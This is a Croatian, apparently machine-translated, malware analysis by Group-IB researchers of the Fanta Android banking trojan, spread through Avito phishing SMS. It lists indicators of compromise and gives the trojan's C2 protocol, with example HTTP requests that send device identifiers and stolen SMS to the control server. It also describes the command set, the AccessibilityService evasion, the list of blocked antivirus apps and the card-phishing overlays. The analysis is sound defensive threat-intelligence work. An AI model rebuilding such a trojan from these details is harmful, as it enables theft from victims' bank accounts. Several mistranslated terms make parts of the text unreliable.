Jednog dana poželite nešto prodati na Avitu i nakon što objavite detaljan opis svog proizvoda (na primjer, RAM modul), dobit ćete ovu poruku:
Nakon što otvorite link, vidjet ćete naizgled bezazlenu stranicu koja vas, sretnog i uspješnog prodavača, obavještava da je kupnja obavljena:
Nakon što kliknete gumb "Nastavi", APK datoteka s ikonom i nazivom koji izaziva povjerenje bit će preuzet na vaš Android uređaj. Instalirali ste aplikaciju koja je iz nekog razloga tražila AccessibilityService prava, zatim se pojavilo par prozora pa brzo nestalo i... To je to.
Idete provjeriti svoj saldo, ali iz nekog razloga vaša bankarska aplikacija ponovno traži podatke o vašoj kartici. Nakon unosa podataka događa se nešto strašno: iz nekog Vama još uvijek nejasnog razloga s Vašeg računa počinje nestajati novac. Pokušavate riješiti problem, ali vaš telefon se opire: pritišće tipke "Natrag" i "Početna", ne isključuje se i ne dopušta vam da aktivirate sigurnosne mjere. Kao rezultat toga, ostali ste bez novca, vaša roba nije kupljena, zbunjeni ste i pitate se: što se dogodilo?
Odgovor je jednostavan: postali ste žrtva Android Trojanca Fanta, člana Flexnet obitelji. Kako se to dogodilo? Objasnimo sada.
Autori: Andrej Polovinkin, mlađi specijalist za analizu malwarea, Ivan Pisarev, stručnjak za analizu zlonamjernog softvera.
Neke statistike
Obitelj Android trojanaca Flexnet postala je poznata još 2015. Tijekom prilično dugog razdoblja aktivnosti obitelj se proširila na nekoliko podvrsta: Fanta, Limebot, Lipton itd. Trojanac, kao i infrastruktura povezana s njim, ne miruju: razvijaju se nove učinkovite distribucijske sheme - u našem slučaju, visokokvalitetne phishing stranice usmjerene na određenog korisnika-prodavača, a programeri trojanaca slijede moderne trendove u pisanje virusa - dodavanje nove funkcionalnosti koja omogućuje učinkovitiju krađu novca sa zaraženih uređaja i zaobilaženje zaštitnih mehanizama.
Kampanja opisana u ovom članku usmjerena je na korisnike iz Rusije, manji broj zaraženih uređaja zabilježen je u Ukrajini, a još manji u Kazahstanu i Bjelorusiji.
Iako je Flexnet u Android Trojan areni već više od 4 godine i mnogi su ga istraživači detaljno proučavali, još uvijek je u dobroj formi. Počevši od siječnja 2019. potencijalni iznos štete iznosi više od 35 milijuna rubalja - i to samo za kampanje u Rusiji. Tijekom 2015. godine na podzemnim forumima prodavale su se razne verzije ovog Android Trojana, gdje se mogao pronaći i izvorni kod Trojana s detaljnim opisom. To znači da je statistika šteta u svijetu još impresivnija. Nije loš pokazatelj za tako starog čovjeka, zar ne?
Od prodaje do prevare
Kao što je vidljivo iz prethodno predstavljene snimke zaslona phishing stranice internetskog servisa za objavu oglasa Avito, ona je pripremljena za određenu žrtvu. Očigledno, napadači koriste jedan od Avitovih parsera, koji izdvaja telefonski broj i ime prodavača, kao i opis proizvoda. Nakon proširenja stranice i pripreme APK datoteke, žrtvi se šalje SMS s njegovim imenom i vezom na phishing stranicu koja sadrži opis njegovog proizvoda i iznos dobiven od “prodaje” proizvoda. Klikom na gumb korisnik dobiva zlonamjernu APK datoteku - Fanta.
Studija domene shcet491[.]ru pokazala je da je delegirana Hostingerovim DNS poslužiteljima:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Datoteka zone domene sadrži unose koji upućuju na IP adrese 31.220.23[.]236, 31.220.23[.]243 i 31.220.23[.]235. Međutim, primarni zapis resursa domene (A zapis) upućuje na poslužitelj s IP adresom 178.132.1[.]240.
IP adresa 178.132.1[.]240 nalazi se u Nizozemskoj i pripada hosteru WorldStream. IP adrese 31.220.23[.]235, 31.220.23[.]236 i 31.220.23[.]243 nalaze se u Velikoj Britaniji i pripadaju dijeljenom hosting poslužitelju HOSTINGER. Korišten kao diktafon openprov-ru. Sljedeće domene također su razriješene na IP adresu 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Treba napomenuti da su veze u sljedećem formatu bile dostupne s gotovo svih domena:
http://(www.){0,1}<%domain%>/[0-9]{7}
Ovaj predložak također uključuje poveznicu iz SMS poruke. Na temelju povijesnih podataka, utvrđeno je da jedna domena odgovara nekoliko poveznica u gore opisanom obrascu, što ukazuje da je jedna domena korištena za distribuciju Trojanaca na nekoliko žrtava.
Idemo malo unaprijed: trojanac preuzet preko veze iz SMS-a koristi adresu kao kontrolni poslužitelj onusedseddohap[.]klub. Ova je domena registrirana 2019-03-12, a počevši od 2019-04-29, APK aplikacije su bile u interakciji s ovom domenom. Na temelju podataka dobivenih od VirusTotal-a, ukupno 109 aplikacija je bilo u interakciji s ovim poslužiteljem. Sama domena razriješila se na IP adresu 217.23.14[.]27, koji se nalazi u Nizozemskoj iu vlasništvu je hostera WorldStream. Korišten kao diktafon namecheap. Domene su također razriješene na ovu IP adresu bad-racoon[.]klub (počevši od 2018) i bad-racoon[.]uživo (počevši od 2018.). S domenom bad-racoon[.]klub s više od 80 APK datoteka u interakciji bad-racoon[.]uživo - više od 100.
Općenito, napad napreduje na sljedeći način:
Što je ispod Fantinog poklopca?
Kao i mnogi drugi Android trojanci, Fanta može čitati i slati SMS poruke, slati USSD zahtjeve i prikazivati vlastite prozore na vrhu aplikacija (uključujući bankarske). Međutim, arsenal funkcionalnosti ove obitelji je stigao: Fanta je počela koristiti AccessibilityService u razne svrhe: čitanje sadržaja obavijesti iz drugih aplikacija, sprječavanje otkrivanja i zaustavljanje izvršavanja Trojana na zaraženom uređaju itd. Fanta radi na svim verzijama Androida ne mlađim od 4.4. U ovom ćemo članku pobliže pogledati sljedeći Fanta uzorak:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Odmah nakon lansiranja
Odmah nakon pokretanja, trojanac skriva svoju ikonu. Aplikacija može raditi samo ako ime zaraženog uređaja nije na popisu:
- android_x86
- VirtualBox
- Nexus 5X (glavni)
- Nexus 5 (britva)
Ova provjera se provodi u glavnom servisu Trojana - MainService. Prilikom prvog pokretanja konfiguracijski parametri aplikacije inicijaliziraju se na zadane vrijednosti (format za pohranjivanje konfiguracijskih podataka i njihovo značenje bit će raspravljeno kasnije), a novi zaraženi uređaj registriran je na kontrolnom poslužitelju. HTTP POST zahtjev s vrstom poruke bit će poslan na poslužitelj register_bot te informacije o zaraženom uređaju (verzija Androida, IMEI, telefonski broj, naziv operatera i kod zemlje u kojoj je operater registriran). Adresa služi kao kontrolni poslužitelj hXXp://onuseseddohap[.]club/controller.php. Kao odgovor, poslužitelj šalje poruku koja sadrži polja bot_id, bot_pwd, server — aplikacija sprema ove vrijednosti kao parametre CnC poslužitelja. Parametar server izborno ako polje nije primljeno: Fanta koristi adresu registracije - hXXp://onuseseddohap[.]club/controller.php. Funkcija promjene CnC adrese može se koristiti za rješavanje dva problema: za ravnomjernu raspodjelu opterećenja između nekoliko poslužitelja (ako postoji veliki broj zaraženih uređaja, opterećenje neoptimiziranog web poslužitelja može biti veliko), te za korištenje alternativni poslužitelj u slučaju kvara jednog od CnC poslužitelja.
Ako se dogodi greška prilikom slanja zahtjeva, trojanac će ponoviti proces registracije nakon 20 sekundi.
Nakon što je uređaj uspješno registriran, Fanta će prikazati sljedeću poruku korisniku:
Važna napomena: servis je zvao Sigurnost sustava — naziv trojanskog servisa, a nakon klika na gumb ОК Otvorit će se prozor s postavkama pristupačnosti zaraženog uređaja, gdje korisnik mora dodijeliti prava pristupačnosti za zlonamjernu uslugu:
Čim se korisnik uključi AccessibilityService, Fanta dobiva pristup sadržaju prozora aplikacije i akcijama koje se u njima izvode:
Odmah nakon dobivanja prava pristupa, trojanac zahtijeva administratorska prava i prava čitanja obavijesti:
Koristeći AccessibilityService, aplikacija simulira pritiske tipki, čime si daje sva potrebna prava.
Fanta stvara višestruke instance baze podataka (koje će biti opisane kasnije) potrebne za pohranu konfiguracijskih podataka, kao i informacija prikupljenih u procesu o zaraženom uređaju. Kako bi poslao prikupljene informacije, trojanac stvara ponavljajući zadatak dizajniran za preuzimanje polja iz baze podataka i primanje naredbe od kontrolnog poslužitelja. Interval za pristup CnC-u je postavljen ovisno o verziji Androida: u slučaju 5.1, interval će biti 10 sekundi, inače 60 sekundi.
Da bi primio naredbu, Fanta postavlja zahtjev GetTask na poslužitelj za upravljanje. Kao odgovor, CnC može poslati jednu od sljedećih naredbi:
| Momčad | Opis |
|---|---|
| 0 | Pošalji SMS poruku |
| 1 | Uputite telefonski poziv ili USSD naredbu |
| 2 | Ažurira parametar interval |
| 3 | Ažurira parametar presijecati |
| 6 | Ažurira parametar smsManager |
| 9 | Počnite prikupljati SMS poruke |
| 11 | Vratite telefon na tvorničke postavke |
| 12 | Omogući/onemogući bilježenje stvaranja dijaloškog okvira |
Fanta također prikuplja obavijesti iz 70 bankovnih aplikacija, sustava za brza plaćanja i e-novčanika te ih pohranjuje u bazu podataka.
Pohranjivanje konfiguracijskih parametara
Za pohranu konfiguracijskih parametara Fanta koristi standardni pristup za Android platformu - Postavke-dosjei. Postavke će biti spremljene u datoteku pod nazivom postavke. Opis spremljenih parametara nalazi se u donjoj tablici.
| ime | Zadana vrijednost | Moguće vrijednosti | Opis |
|---|---|---|---|
| id | 0 | Integer | ID bota |
| server | hXXp://onuseseddohap[.]klub/ | URL | Adresa poslužitelja kontrole |
| osoba | - | Niz | Lozinka poslužitelja |
| interval | 20 | Integer | Vremenski interval. Označava koliko dugo treba odgoditi sljedeće zadatke:
|
| presijecati | svi | sve/telBroj | Ako je polje jednako nizu svi ili telNumber, tada će primljenu SMS poruku presresti aplikacija i neće je prikazati korisniku |
| smsManager | 0 | 0/1 | Omogućite/onemogućite aplikaciju kao zadanog primatelja SMS-a |
| readDialog | lažan | Točno netočno | Omogući/onemogući bilježenje događaja AccessibilityEvent |
Fanta također koristi datoteku smsManager:
| ime | Zadana vrijednost | Moguće vrijednosti | Opis |
|---|---|---|---|
| pckg | - | Niz | Ime korištenog upravitelja SMS poruka |
Interakcija s bazama podataka
Tijekom svog rada trojanac koristi dvije baze podataka. Baza podataka imenovana a koristi se za pohranu raznih informacija prikupljenih s telefona. Druga baza podataka je imenovana fanta.db i koristi se za spremanje postavki odgovornih za stvaranje phishing prozora namijenjenih prikupljanju podataka o bankovnim karticama.
Trojanac koristi bazu podataka а za pohranu prikupljenih informacija i zapisivanje vaših radnji. Podaci se pohranjuju u tablicu drva. Za izradu tablice upotrijebite sljedeći SQL upit:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Baza podataka sadrži sljedeće podatke:
1. Bilježenje pokretanja zaraženog uređaja porukom Telefon uključen!
2. Obavijesti iz aplikacija. Poruka se generira prema sljedećem predlošku:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Podaci o bankovnoj kartici iz obrazaca za krađu identiteta koje je stvorio trojanac. Parametar VIEW_NAME može biti jedno od sljedećeg:
- AliExpress
- Avito
- Google Play
- Razno
Poruka se bilježi u formatu:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Dolazne/odlazne SMS poruke u formatu:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Informacije o paketu koji stvara dijaloški okvir u formatu:
(<%Package name%>)<%Package information%>
Primjer tablice drva:
Jedna od funkcionalnosti Fante je prikupljanje podataka o bankovnim karticama. Prikupljanje podataka događa se stvaranjem phishing prozora prilikom otvaranja bankovnih aplikacija. Trojanac kreira prozor za krađu identiteta samo jednom. Podaci o tome da je prozor prikazan korisniku pohranjuju se u tablicu postavke u bazi podataka fanta.db. Za izradu baze podataka upotrijebite sljedeći SQL upit:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Sva polja tablice postavke prema zadanim postavkama inicijalizirano na 1 (stvori prozor za krađu identiteta). Nakon što korisnik unese svoje podatke, vrijednost će biti postavljena na 0. Primjer polja tablice postavke:
- can_login — polje je odgovorno za prikaz obrasca prilikom otvaranja bankovne aplikacije
- prva_banka - nije korišteno
- can_avito — polje je odgovorno za prikaz obrasca prilikom otvaranja aplikacije Avito
- can_ali — polje je odgovorno za prikaz obrasca prilikom otvaranja aplikacije Aliexpress
- može_drugo — polje je odgovorno za prikaz obrasca prilikom otvaranja bilo koje aplikacije s popisa: Yula, Pandao, Drom Auto, Novčanik. Kartice s popustima i bonusima, Aviasales, Booking, Trivago
- može_kartica — polje je odgovorno za prikaz obrasca prilikom otvaranja Google Play
Interakcija s poslužiteljem za upravljanje
Interakcija mreže s poslužiteljem za upravljanje odvija se putem HTTP protokola. Za rad s mrežom Fanta koristi popularnu knjižnicu Retrofit. Zahtjevi se šalju na: hXXp://onuseseddohap[.]club/controller.php. Adresa poslužitelja može se promijeniti prilikom registracije na poslužitelju. Kolačići mogu biti poslani kao odgovor s poslužitelja. Fanta upućuje sljedeće zahtjeve poslužitelju:
- Registracija bota na kontrolnom poslužitelju događa se jednom, pri prvom pokretanju. Sljedeći podaci o zaraženom uređaju šalju se na poslužitelj:
· kolačić — kolačići primljeni od poslužitelja (zadana vrijednost je prazan niz)
· način — string konstanta register_bot
· prefiks — cjelobrojna konstanta 2
· verzija_sdk — formira se prema sljedećem predlošku: /(Avit)
· IMEI — IMEI zaraženog uređaja
· zemlja — šifra zemlje u kojoj je operater registriran, u ISO formatu
· broj - broj telefona
· operater — naziv operateraPrimjer zahtjeva poslanog poslužitelju:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>Kao odgovor na zahtjev, poslužitelj mora vratiti JSON objekt koji sadrži sljedeće parametre:
· bot_id — ID zaraženog uređaja. Ako je bot_id jednak 0, Fanta će ponovno izvršiti zahtjev.
bot_pwd — lozinka za poslužitelj.
poslužitelj — adresa kontrolnog poslužitelja. Izborni parametar. Ako parametar nije naveden, koristit će se adresa spremljena u aplikaciji.Primjer JSON objekta:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Zahtjev za primanje naredbe od poslužitelja. Sljedeći podaci šalju se na poslužitelj:
· kolačić — kolačići primljeni od poslužitelja
· ponuda — id zaraženog uređaja koji je primljen prilikom slanja zahtjeva register_bot
· osoba — lozinka za poslužitelj
· divice_admin — polje utvrđuje jesu li stečena administratorska prava. Ako su stečena administratorska prava, polje je jednako 1, inače 0
· Pristupačnost — Radni status usluge pristupačnosti. Ako je usluga pokrenuta, vrijednost je 1, inače 0
· SMSManager — pokazuje je li trojanac omogućen kao zadana aplikacija za primanje SMS-a
· zaslon — prikazuje u kakvom je stanju ekran. Vrijednost će biti postavljena 1, ako je ekran uključen, inače 0;Primjer zahtjeva poslanog poslužitelju:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Ovisno o naredbi, poslužitelj može vratiti JSON objekt s različitim parametrima:
· Momčad Pošalji SMS poruku: Parametri sadrže telefonski broj, tekst SMS poruke i ID poruke koja se šalje. Identifikator se koristi prilikom slanja poruke poslužitelju s tipom postaviSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Momčad Uputite telefonski poziv ili USSD naredbu: Telefonski broj ili naredba dolazi u tijelu odgovora.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Momčad Promijenite parametar intervala.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Momčad Promjena parametra presretanja.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· Momčad Promijenite polje SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Momčad Prikupiti SMS poruke sa zaraženog uređaja.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Momčad Vratite telefon na tvorničke postavke:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Momčad Promijenite parametar ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Slanje poruke s tipom postaviSmsStatus. Ovaj zahtjev se postavlja nakon što se naredba izvrši Pošalji SMS poruku. Zahtjev izgleda ovako:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Prijenos sadržaja baze podataka. Po zahtjevu se prenosi jedan red. Sljedeći podaci šalju se na poslužitelj:
· kolačić — kolačići primljeni od poslužitelja
· način — string konstanta setSaveInboxSms
· ponuda — id zaraženog uređaja koji je primljen prilikom slanja zahtjeva register_bot
· tekst — tekst u trenutnom zapisu baze podataka (polje d sa stola drva u bazi podataka а)
· broj — naziv trenutnog zapisa baze podataka (polje p sa stola drva u bazi podataka а)
· sms_način — cjelobrojna vrijednost (polje m sa stola drva u bazi podataka а)Zahtjev izgleda ovako:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Ako se uspješno pošalje na poslužitelj, red će biti izbrisan iz tablice. Primjer JSON objekta koji vraća poslužitelj:
{ "response":[], "status":"ok" }
Interakcija s AccessibilityServiceom
AccessibilityService je implementiran kako bi se osobama s invaliditetom olakšalo korištenje Android uređaja. U većini slučajeva potrebna je fizička interakcija za interakciju s aplikacijom. AccessibilityService vam omogućuje da ih radite programski. Fanta koristi uslugu za stvaranje lažnih prozora u bankarskim aplikacijama i sprječavanje korisnika da otvore postavke sustava i neke aplikacije.
Trojanac pomoću funkcionalnosti AccessibilityService prati promjene elemenata na zaslonu zaraženog uređaja. Kao što je prethodno opisano, Fanta postavke sadrže parametar odgovoran za operacije zapisivanja s dijaloškim okvirima - readDialog. Ako je ovaj parametar postavljen, podaci o nazivu i opisu paketa koji je pokrenuo događaj bit će dodani u bazu podataka. Trojanac izvodi sljedeće radnje kada se pokrenu događaji:
- Simulira pritiskanje tipki za povratak i početnu stranicu u sljedećim slučajevima:
· ako korisnik želi ponovno pokrenuti svoj uređaj
· ako korisnik želi izbrisati aplikaciju “Avito” ili promijeniti prava pristupa
· ako se na stranici spominje aplikacija “Avito”.
· prilikom otvaranja aplikacije Google Play Protect
· prilikom otvaranja stranica s postavkama AccessibilityService
· kada se pojavi dijaloški okvir Sigurnost sustava
· prilikom otvaranja stranice s postavkom "Crtaj preko druge aplikacije".
· prilikom otvaranja stranice “Aplikacije”, “Oporavak i resetiranje”, “Resetiranje podataka”, “Resetiranje postavki”, “Razvojna ploča”, “Posebno. mogućnosti”, “Posebne mogućnosti”, “Posebna prava”
· ako su događaj generirale određene aplikacije.Popis aplikacija
- android
- Master Lite
- Očistite majstora
- Clean Master za x86 CPU
- Meizu Application Permission Management
- MIUI Sigurnost
- Clean Master - Antivirus & Cache i Garbage Cleaner
- Roditeljski nadzor i GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Čistač virusa, antivirusni program, čistač (MAX Security)
- Mobile AntiVirus Security PRO
- Avast antivirus i besplatna zaštita 2019
- Mobilna sigurnost MegaFon
- AVG zaštita za Xperia
- Mobilna sigurnost
- Malwarebytes Antivirus i zaštita
- Antivirus za Android 2019
- Security Master - Antivirus, VPN, AppLock, Booster
- AVG antivirus za Huawei tablet System Manager
- Samsung pristupačnost
- Samsung Smart Manager
- Majstor sigurnosti
- Pojačavač brzine
- dr.web
- Dr.Web sigurnosni prostor
- Dr.Web mobilni kontrolni centar
- Dr.Web Security Space Life
- Dr.Web mobilni kontrolni centar
- Antivirus i mobilna sigurnost
- Kaspersky Internet Security: Antivirus i zaštita
- Trajanje baterije Kaspersky: ušteda i pojačanje
- Kaspersky Endpoint Security - zaštita i upravljanje
- AVG Antivirus free 2019 – Zaštita za Android
- Android antivirusni
- Norton Mobile Security i Antivirus
- Antivirus, firewall, VPN, mobilna sigurnost
- Mobile Security: antivirus, VPN, zaštita od krađe
- Antivirus za Android
- Ako se traži dopuštenje prilikom slanja SMS poruke na kratki broj, Fanta simulira klik na potvrdni okvir Zapamti izbor i gumb poslati.
- Kada pokušate trojancu oduzeti administratorska prava, on zaključava zaslon telefona.
- Sprječava dodavanje novih administratora.
- Ako je antivirusna aplikacija dr.web otkrio prijetnju, Fanta oponaša pritiskanje gumba zanemariti.
- Trojanac simulira pritiskanje gumba za povratak i početnu stranicu ako je događaj generirala aplikacija Njega Samsung uređaja.
- Fanta kreira phishing prozore s obrascima za unos podataka o bankovnim karticama ako je pokrenuta aplikacija s popisa od 30-ak različitih internetskih servisa. Među njima: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto itd.
Obrasci za krađu identiteta
Fanta analizira koje su aplikacije pokrenute na zaraženom uređaju. Ako je otvorena interesna aplikacija, trojanac prikazuje prozor za krađu identiteta povrh svih ostalih, što je obrazac za unos podataka o bankovnoj kartici. Korisnik mora unijeti sljedeće podatke:
- Nomer karty
- Datum isteka kartice
- CVV
- Ime vlasnika kartice (ne za sve banke)
Ovisno o pokrenutoj aplikaciji, prikazat će se različiti prozori za krađu identiteta. Ispod su primjeri nekih od njih:
Aliexpress:
Avito:
Za neke druge primjene, npr. Google Play Market, Aviasales, Pandao, Booking, Trivago:
Kako je stvarno bilo
Srećom, pokazalo se da je osoba koja je primila SMS poruku opisanu na početku članka stručnjak za kibernetičku sigurnost. Stoga se prava, neredateljska verzija razlikuje od ranije ispričane: osoba je primila zanimljiv SMS, nakon čega ga je predala timu Group-IB Threat Hunting Intelligence. Rezultat napada je ovaj članak. Sretan kraj, zar ne? No, ne završavaju sve priče tako uspješno, a kako vaša ne bi izgledala kao redateljska verzija s gubitkom novca, u većini slučajeva dovoljno je pridržavati se sljedećih davno opisanih pravila:
- nemojte instalirati aplikacije za mobilni uređaj s Android OS-om iz bilo kojeg izvora osim Google Playa
- Prilikom instaliranja aplikacije obratite posebnu pozornost na prava koja aplikacija traži
- obratite pozornost na ekstenzije preuzetih datoteka
- redovito instalirajte ažuriranja OS-a Android
- ne posjećujte sumnjive resurse i ne preuzimajte datoteke od tamo
- Nemojte klikati na linkove primljene u SMS porukama.
Izvor: www.habr.com